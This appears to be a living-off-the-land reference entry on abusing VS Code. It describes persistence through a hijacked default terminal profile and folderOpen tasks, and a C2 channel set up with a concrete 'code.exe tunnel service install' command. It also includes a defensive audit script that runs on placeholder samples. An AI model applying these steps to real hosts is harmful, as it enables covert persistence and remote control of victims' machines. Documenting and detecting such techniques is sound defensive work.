
Visual Studio Code, also commonly referred to as VS Code, is a source-code editor made by Microsoft with the Electron Framework, for Windows, Linux and macOS.



Persistence

Steps to create a VS Code terminal persistence profile
Override/Create a workspace/settings.json config. Add a new terminal profile with the payload in the "path" and "args" parameters. Set the new terminal profile as default.

Use case: Establishing persistence on a Windows host
Privileges required: User
MITRE ATT&CK®: T1546

Steps to create and enable a VS Code task for persistence
Create/Modify a task in a .code-workspace file, or a tasks.json file inside a .vscode folder. Add a new task with the payload in the 'command' or 'args' parameters. Add one of the possible triggers: the 'runOption' parameter with a value of 'folderOpen', or shortcut keys in the keybindings.json file.

Use case: Establishing persistence on a Windows host
Privileges required: User
MITRE ATT&CK®: T1546
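
A defender-side audit for the two persistence techniques above, as an added example that is not part of the original entry: it parses the content of a settings.json, tasks.json or .code-workspace file and reports custom Windows terminal profiles (flagging the default one) and tasks whose runOptions.runOn is folderOpen. The sample file contents and placeholder commands are constructed, and keybindings.json triggers are not covered.

```python
import json
import re

# VS Code config files are JSONC: drop comments (keeping string literals intact)
# and, as a simplification, trailing commas before a closing bracket.
_JSONC = re.compile(r'"(?:\\.|[^"\\])*"|//[^\n]*|/\*.*?\*/', re.S)

def load_jsonc(text):
    body = _JSONC.sub(lambda m: m.group(0) if m.group(0)[0] == '"' else "", text)
    return json.loads(re.sub(r",(\s*[}\]])", r"\1", body))

def audit_settings(text):
    """Return each custom Windows terminal profile and whether it is the default."""
    cfg = load_jsonc(text)
    cfg = cfg.get("settings", cfg)  # a .code-workspace file nests settings here
    default = cfg.get("terminal.integrated.defaultProfile.windows")
    profiles = cfg.get("terminal.integrated.profiles.windows") or {}
    return [
        {"profile": n, "path": p["path"], "args": p.get("args", []), "is_default": n == default}
        for n, p in profiles.items()
        if isinstance(p, dict) and "path" in p
    ]

def audit_tasks(text):
    """Return tasks that run automatically when the folder is opened."""
    tasks = load_jsonc(text).get("tasks", [])
    if isinstance(tasks, dict):  # .code-workspace: "tasks": {"version": ..., "tasks": [...]}
        tasks = tasks.get("tasks", [])
    return [
        {"label": t.get("label"), "command": t.get("command"), "args": t.get("args", [])}
        for t in tasks
        if isinstance(t, dict) and (t.get("runOptions") or {}).get("runOn") == "folderOpen"
    ]

# Constructed samples with placeholder commands, not taken from a real host.
SAMPLE_SETTINGS = r'''{
  // .vscode/settings.json
  "terminal.integrated.profiles.windows": {
    "Build Shell": {"path": "C:\\Windows\\System32\\cmd.exe", "args": ["/k", "placeholder.cmd"]},
  },
  "terminal.integrated.defaultProfile.windows": "Build Shell",
}'''
SAMPLE_TASKS = r'''{"version": "2.0.0", "tasks": [
  {"label": "lint", "type": "shell", "command": "npm", "args": ["run", "lint"]},
  {"label": "sync", "type": "shell", "command": "placeholder.cmd",
   "runOptions": {"runOn": "folderOpen"}}
]}'''

if __name__ == "__main__":
    print(audit_settings(SAMPLE_SETTINGS), audit_tasks(SAMPLE_TASKS))
```

A profile that is both custom and set as the default, or any task returned by audit_tasks, is worth reviewing before the workspace is opened or trusted.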

C2 Channel

Steps to create and enable a VS Code Remote Tunnel as C2 service
Use '.\code.exe tunnel service install --no-sleep' from the CLI and authorize yourself on the source host with the 6-digit code, or use the 'Turn on Remote Tunnel Access' option in the VS Code GUI account menu and authorize yourself in the browser of the target host. You'll then get a link such as: https://vscode.dev/tunnel/<victim's hostname>/<directory>. Open this link in a browser and authorize yourself on the source host with the same GitHub/Microsoft account. Once you connect with this link, an SSH connection is created over the tunnel to provide end-to-end encryption.

Use case: Establishing C2 Channel on a Windows host
Privileges required: User
MITRE ATT&CK®: T1071